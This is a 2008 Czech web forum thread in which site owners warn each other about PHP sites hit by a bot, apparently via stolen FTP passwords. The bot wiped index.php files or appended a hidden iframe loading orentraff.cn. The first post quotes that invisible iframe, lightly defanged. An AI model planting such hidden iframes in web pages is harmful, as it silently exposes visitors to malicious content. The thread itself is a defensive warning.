ORENTRAFF.cn

Duha · Příspěvek od **Duha** » úte úno 05, 2008 1:32 pm

Zdravím,
komu nějaká havěť taky napadla PHP stránky?
Likviduje to INDEX.PHP, na několika se mi ale stalo že to "jen" přidalo

<iframe src="hxxp://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe>

(teda místo hxxp klasika)

Přes WHOIS to vyhází podivné údaje...
S podivem je, že máme stránky na Active24 (Linux)...
Tak bacha na to a kontrolujte stránky!

Mějte se,
Duha

Příspěvek od **dejvidek** » úte úno 05, 2008 1:57 pm

Je něco divného na active24?

Nějak je ta havěť na ně zaměřená?

dejv

Duha · Příspěvek od **Duha** » úte úno 05, 2008 2:28 pm

Nevím nevím, googlil jsem a na pár zpráv ohledně nefunkčnosti stránek v souvislosti s Orentraff.cn jsem našel... smaže to obsah INDEX.PHP a leze to napříč netem

Příspěvek od **Honza** » úte úno 05, 2008 5:19 pm

Duha píše:smaže to obsah INDEX.PHP a leze to napøíè netem

Jak smaže? To snad není taková p.del - nebo nìjaký security trouble apache? Hodily by se probrobnosti toho, co a za jakých okolností to mùže napadnout.

Duha · Příspěvek od **Duha** » úte úno 05, 2008 5:51 pm

Honza píše:Jak smaže? To snad není taková p.del

To mě právě dostalo, nejdřív jsem myslel že jim třeba spadnul server a nepovedla se obnova filesystému, ale pak v dalších index.php jsem zjistil že to třeba na konec souboru přidalo to <iframe>, další měl zas velikost 0 byte...
Každopádně je to hustý

Duha · Příspěvek od **Duha** » stř úno 06, 2008 3:38 pm

Zdravím,
tak mi bylo podporou hostingu sděleno že ty změny přišly z IP ze Singapuru, zřejmě odposlechnutý heslo k FTP a robot zařídil zbytek

Jen mě mate že to bylo na hromadě stránek i ve světě...
(ode dneška už k FTP přistupuju přes SSL)

Mějte se, a hlavně keep crunching